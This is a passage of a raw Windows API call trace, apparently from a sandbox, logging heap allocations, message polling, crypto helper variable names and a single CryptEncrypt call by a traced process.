0x3bf08b0 [0259.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55078 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55088 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f78 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42be) returned 0x2f182d8 [0259.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.685] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.685] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.686] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.686] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.686] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.686] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.686] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.686] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.686] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.687] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.687] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.687] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.687] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.688] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0259.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54300 [0259.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0259.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0259.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0259.689] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x42be, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x42c0) returned 1 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0259.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0259.693] CharLowerBuffW (in: lpsz="byte[17088]", cchLength=0xb | out: lpsz="byte[17088]") returned 0xb [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.694] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.695] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) 